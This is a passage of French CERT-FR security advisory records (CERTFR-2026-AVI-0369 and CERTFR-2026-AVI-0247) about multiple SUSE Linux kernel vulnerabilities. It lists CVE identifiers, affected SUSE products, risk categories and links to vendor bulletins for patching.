"url": "https://www.cve.org/CVERecord?id=CVE-2023-53847"
},
{
"name": "CVE-2024-53093",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53093"
},
{
"name": "CVE-2026-23080",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23080"
},
{
"name": "CVE-2023-54121",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54121"
},
{
"name": "CVE-2023-54261",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54261"
},
{
"name": "CVE-2023-54005",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54005"
},
{
"name": "CVE-2025-40351",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40351"
},
{
"name": "CVE-2025-68264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68264"
},
{
"name": "CVE-2026-23154",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23154"
},
{
"name": "CVE-2025-68764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68764"
}
],
"initial_release_date": "2026-03-27T00:00:00",
"last_revision_date": "2026-03-27T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0369",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-03-27T00:00:00.000000"
}
],
"risks": [
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Ex\u00e9cution de code arbitraire"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "D\u00e9ni de service"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de SUSE. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et une atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de SUSE",
"vendor_advisories": [
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20774-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620774-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0970-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260970-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0983-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260983-1"
},
{
"published_at": "2026-03-24",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0985-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260985-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1077-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261077-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20778-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620778-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20779-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620779-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0961-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260961-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1073-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261073-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20789-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620789-1"
},
{
"published_at": "2026-03-22",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0946-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260946-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0962-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260962-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0967-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260967-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20775-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620775-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1088-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261088-1"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0939-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260939-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20814-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620814-1"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1046-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261046-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20788-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620788-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20786-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620786-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0954-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260954-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20819-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620819-1"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1045-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261045-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20815-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620815-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1060-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261060-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20790-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620790-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20772-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620772-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20776-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620776-1"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1002-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261002-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0984-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260984-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0964-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260964-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20781-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620781-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1081-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261081-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1048-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261048-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1059-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261059-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0958-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260958-1"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1000-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261000-1"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1039-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261039-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20791-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620791-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20773-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620773-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20816-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620816-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1083-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261083-1"
},
{
"published_at": "2026-03-22",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0951-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260951-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20787-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620787-1"
},
{
"published_at": "2026-03-24",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0992-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260992-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20777-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620777-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1089-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261089-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1078-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261078-1"
},
{
"published_at": "2026-03-24",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0997-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260997-1"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1003-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261003-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20794-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620794-1"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1041-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261041-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20780-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620780-1"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1049-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261049-1"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:1044-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261044-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20817-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620817-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20782-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620782-1"
},
{
"published_at": "2026-03-23",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20792-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620792-1"
},
{
"published_at": "2026-03-22",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0953-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260953-1"
}
]
}
CERTFR-2026-AVI-0247
Vulnerability from certfr_avis - Published: 2026-03-06 - Updated: 2026-03-06
De multiples vulnérabilités ont été découvertes dans le noyau Linux de SUSE. Certaines d'entre elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et une atteinte à l'intégrité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| SUSE | N/A | SUSE Linux Enterprise High Performance Computing 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Micro 5.3 | ||
| SUSE | N/A | SUSE Linux Enterprise Real Time 15 SP7 | ||
| SUSE | N/A | SUSE Linux Micro 6.1 | ||
| SUSE | N/A | SUSE Linux Enterprise High Performance Computing 12 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 12 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Live Patching 15-SP4 | ||
| SUSE | N/A | SUSE Linux Enterprise Server High Availability Extension 16.0 | ||
| SUSE | N/A | openSUSE Leap 15.4 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 11 SP4 | ||
| SUSE | N/A | SUSE Linux Enterprise Server for SAP Applications 15 SP4 | ||
| SUSE | N/A | SUSE Linux Enterprise Server for SAP Applications 15 SP7 | ||
| SUSE | N/A | openSUSE Leap 15.5 | ||
| SUSE | N/A | SUSE Linux Micro Extras 6.1 | ||
| SUSE | N/A | SUSE Linux Enterprise High Performance Computing 15 SP4 | ||
| SUSE | N/A | SUSE Linux Enterprise Live Patching 15-SP6 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Server for SAP Applications 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Real Time 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Live Patching 12-SP5 | ||
| SUSE | N/A | SUSE Linux Micro 6.2 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Live Patching 15-SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Live Patching 15-SP5 | ||
| SUSE | N/A | SUSE Linux Micro Extras 6.2 | ||
| SUSE | N/A | SUSE Linux Enterprise Real Time 15 SP6 | ||
| SUSE | N/A | openSUSE Leap 15.6 | ||
| SUSE | N/A | SUSE Linux Enterprise Server for SAP Applications 16.0 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP4 | ||
| SUSE | N/A | SUSE Linux Enterprise Real Time 15 SP4 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 16.0 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 11 SP4 LTSS EXTREME CORE | ||
| SUSE | N/A | SUSE Linux Enterprise Server for SAP Applications 12 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Micro 5.4 | ||
| SUSE | N/A | SUSE Linux Enterprise Server for SAP Applications 15 SP6 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP6 | ||
| SUSE | N/A | SUSE Linux Enterprise Micro 5.5 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "SUSE Linux Enterprise High Performance Computing 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.3",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Micro 6.1",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing 12 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 12 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP4",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server High Availability Extension 16.0",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.4",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 11 SP4",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Micro Extras 6.1",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing 15 SP4",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 12-SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Micro 6.2",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Micro Extras 6.2",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 16.0",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP4",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP4",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 16.0",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 11 SP4 LTSS EXTREME CORE",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 12 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.4",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2023-54076",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54076"
},
{
"name": "CVE-2025-40273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40273"
},
{
"name": "CVE-2023-53714",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53714"
},
{
"name": "CVE-2025-68230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68230"
},
{
"name": "CVE-2025-40064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40064"
},
{
"name": "CVE-2023-54149",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54149"
},
{
"name": "CVE-2025-71086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71086"
},
{
"name": "CVE-2023-53797",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53797"
},
{
"name": "CVE-2023-53863",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53863"
},
{
"name": "CVE-2023-54142",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54142"
},
{
"name": "CVE-2025-40156",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40156"
},
{
"name": "CVE-2025-68374",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68374"
},
{
"name": "CVE-2023-54000",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54000"
},
{
"name": "CVE-2023-54052",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54052"
},
{
"name": "CVE-2025-68286",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68286"
},
{
"name": "CVE-2025-38520",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38520"
},
{
"name": "CVE-2025-71094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71094"
},
{
"name": "CVE-2025-68788",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68788"
},
{
"name": "CVE-2023-54091",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54091"
},
{
"name": "CVE-2025-40055",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40055"
},
{
"name": "CVE-2023-54083",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54083"
},
{
"name": "CVE-2025-40314",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40314"
},
{
"name": "CVE-2025-40306",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40306"
},
{
"name": "CVE-2025-68778",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68778"
},
{
"name": "CVE-2025-40147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40147"
},
{
"name": "CVE-2023-53821",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53821"
},
{
"name": "CVE-2025-40048",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40048"
},
{
"name": "CVE-2023-53799",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53799"
},
{
"name": "CVE-2025-37751",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37751"
},
{
"name": "CVE-2025-40254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40254"
},
{
"name": "CVE-2025-71064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71064"
},
{
"name": "CVE-2023-54201",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54201"
},
{
"name": "CVE-2025-40219",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40219"
},
{
"name": "CVE-2025-68200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68200"
},
{
"name": "CVE-2025-68725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68725"
},
{
"name": "CVE-2025-68176",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68176"
},
{
"name": "CVE-2025-68741",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68741"
},
{
"name": "CVE-2025-68204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68204"
},
{
"name": "CVE-2025-68795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68795"
},
{
"name": "CVE-2025-68349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68349"
},
{
"name": "CVE-2025-68380",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68380"
},
{
"name": "CVE-2025-68359",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68359"
},
{
"name": "CVE-2025-38515",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38515"
},
{
"name": "CVE-2025-38645",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38645"
},
{
"name": "CVE-2023-54309",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54309"
},
{
"name": "CVE-2025-68339",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68339"
},
{
"name": "CVE-2025-40287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40287"
},
{
"name": "CVE-2023-53995",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53995"
},
{
"name": "CVE-2026-22992",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22992"
},
{
"name": "CVE-2023-54255",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54255"
},
{
"name": "CVE-2023-54271",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54271"
},
{
"name": "CVE-2025-68728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68728"
},
{
"name": "CVE-2025-71087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71087"
},
{
"name": "CVE-2023-54297",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54297"
},
{
"name": "CVE-2023-54112",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54112"
},
{
"name": "CVE-2025-68287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68287"
},
{
"name": "CVE-2025-40240",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40240"
},
{
"name": "CVE-2025-71135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71135"
},
{
"name": "CVE-2025-40081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40081"
},
{
"name": "CVE-2023-54313",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54313"
},
{
"name": "CVE-2023-53759",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53759"
},
{
"name": "CVE-2025-68746",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68746"
},
{
"name": "CVE-2026-22981",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22981"
},
{
"name": "CVE-2025-68773",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68773"
},
{
"name": "CVE-2025-71133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71133"
},
{
"name": "CVE-2023-53994",
